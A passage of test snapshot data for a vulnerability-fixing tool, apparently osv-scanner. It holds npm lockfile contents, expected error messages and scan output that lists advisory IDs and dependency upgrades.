"sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/errors_with_invalid_data_source - 1] --- [TestCommand/errors_with_invalid_data_source - 2] unsupported data-source "github" - must be one of: deps.dev, native --- [TestCommand/errors_with_unsupported_format - 1] --- [TestCommand/errors_with_unsupported_format - 2] unsupported output format "yaml" - must be one of: text, json --- [TestCommand/errors_with_unsupported_strategy - 1] --- [TestCommand/errors_with_unsupported_strategy - 2] unsupported strategy "force" - must be one of: in-place, relax, override --- [TestCommand/fix_non-interactive_in-place_package-lock.json - 1] Scanning /package-lock.json... Found 12 vulnerabilities matching the filter Can fix 7/12 matching vulnerabilities by changing 5 dependencies UPGRADED-PACKAGE: minimatch,3.1.2,3.1.5 UPGRADED-PACKAGE: ajv,6.12.6,6.14.0 UPGRADED-PACKAGE: brace-expansion,1.1.11,1.1.12 UPGRADED-PACKAGE: concat-stream,1.5.0,1.6.1 UPGRADED-PACKAGE: hosted-git-info,2.1.4,2.8.9 FIXED-VULN-IDS: GHSA-23c5-xmqv-rm74,GHSA-2g4f-4pwh-qvx6,GHSA-3ppc-4f35-3m26,GHSA-43f8-2h32-f4cj,GHSA-7r86-cg39-jmmj,GHSA-g74r-ffvr-5q9f,GHSA-v6h2-p8h4-qcjw REMAINING-VULNS: 5 UNFIXABLE-VULNS: 7 Rewriting /package-lock.json... --- [TestCommand/fix_non-interactive_in-place_package-lock.json - 2] --- [TestCommand/fix_non-interactive_in-place_package-lock.json - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "dependencies": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", 